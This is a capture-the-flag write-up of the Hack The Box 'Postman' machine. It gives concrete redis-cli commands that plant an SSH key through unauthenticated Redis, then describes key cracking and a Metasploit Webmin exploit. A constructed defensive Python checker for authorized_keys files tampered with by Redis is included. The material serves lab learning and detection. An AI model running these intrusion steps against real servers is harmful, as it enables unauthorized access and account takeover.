Let’s get started!
The first step is to scan the machine for open services.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Cyber Geek's Personal Website
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Following the indications in the Pentesting Redis section of HackTricks, I tried to connect to Redis
without credentials (and it worked!) and extracted some information from the service.
The most interesting piece of information was the path of the .ssh folder of the redis user inside
the box:
After checking everything, I found the path to the .ssh folder.
Knowing this path, and again following the indications in the Pentesting Redis section of HackTricks, I
created a new ssh key pair, uploaded the public key into the authorized_keys file and logged in via
ssh as the redis user:
Generate an ssh key pair with ssh-keygen.
(echo -e "\n\n"; cat ./id_rsa.pub; echo -e "\n\n") > foo.txt
Adding two blank lines before and after the public key ensures that it is parsed correctly.
cat foo.txt | redis-cli -h 10.10.10.160 -x set crackit
redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
10.10.10.160:6379> config set dbfilename "authorized_keys"
Let’s connect to ssh.
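Why the padding newlines matter, and what a defender can look for: sshd reads authorized_keys line by line and silently skips lines it cannot parse, so a key surrounded by Redis RDB framing still works. The checker below is an added example, not part of this writeup; it flags an authorized_keys file by the RDB magic header and by unparsable lines. Both file bodies are constructed samples and the key material is fake.

```python
import re
from pathlib import Path

# Constructed sample: an authorized_keys file written by Redis as an RDB dump, as in the
# redis-cli steps above. An RDB file starts with the magic "REDIS" plus a 4-digit version;
# the padding newlines leave the injected key on its own line between binary framing.
SAMPLE_RDB_AUTHORIZED_KEYS = (
    b"REDIS0009\xfa\tredis-ver\x055.0.7\xfe\x00\xfb\x01\x00\x00\x07crackit\n\n"
    b"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC+placeholder+not+a+real+key= attacker@kali\n\n\n"
    b"\xff\x12\x34\x56\x78\x9a\xbc\xde\xf0"
)

# Constructed sample: a normal, administrator-managed file.
SAMPLE_CLEAN_AUTHORIZED_KEYS = (
    b"# Matt's laptop\n"
    b"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlaceholderNotARealKey000000000000 matt@laptop\n"
)

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521",
             "sk-ssh-ed25519@openssh.com", "sk-ecdsa-sha2-nistp256@openssh.com")
# optional options field, key type, base64 blob, optional comment
KEY_LINE = re.compile(r'^(?:[\w,="+/.:@-]+\s+)?(?:' + "|".join(map(re.escape, KEY_TYPES))
                      + r")\s+[A-Za-z0-9+/]+=*(?:\s.*)?$")

def audit_authorized_keys(data: bytes) -> list:
    """Return findings for one authorized_keys body; an empty list means it looks clean."""
    findings = []
    if data.startswith(b"REDIS"):
        findings.append("rdb-magic: file begins with a Redis RDB header")
    for lineno, raw in enumerate(data.split(b"\n"), 1):
        text = raw.decode("utf-8", errors="replace").strip()
        if not text or text.startswith("#"):
            continue  # sshd skips blank and comment lines; the padding trick relies on this
        if KEY_LINE.match(text):
            continue
        findings.append(f"line {lineno}: unparsable content {text[:24]!r}")
    return findings

def audit_host(paths=None) -> dict:
    """Audit the usual authorized_keys locations on this host (including the redis home)."""
    if paths is None:
        paths = list(Path("/").glob("home/*/.ssh/authorized_keys"))
        paths += [Path("/root/.ssh/authorized_keys"), Path("/var/lib/redis/.ssh/authorized_keys")]
    return {str(p): audit_authorized_keys(p.read_bytes()) for p in paths if p.is_file()}

if __name__ == "__main__":
    for path, findings in audit_host().items():
        print(path, "OK" if not findings else findings)
```

Run as root on the box (or on any server exposing Redis) to list every authorized_keys file that carries RDB residue; a clean file reports OK.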
Then, once inside the machine, I enumerated it with the linpeas script from the PEAS suite.
This script found one interesting file:
It turned out to be what could be the private ssh key of the user Matt.
After downloading it, extracting the hash from the key in john format and cracking it, you
find that the password used to encrypt the key is computer2008.
But if you try to log in to Matt's account via ssh using the extracted key with that
password, you won't be able to: it is not Matt's current private ssh key.
However, computer2008 is Matt's password, so you can su to Matt.
If you try to log in to the https://Postman:10000 service using the discovered
credentials (Matt : computer2008), you will see that they work!
Then, knowing valid credentials and the version of the running software,
we can exploit a well-known vulnerability of this version of the service:
So just exploit it using the Metasploit module. To do so, set the password, username,
rhosts, and ssl (to true).
If you like my writeup, give me respect on my HTB profile: Exp1o1t9r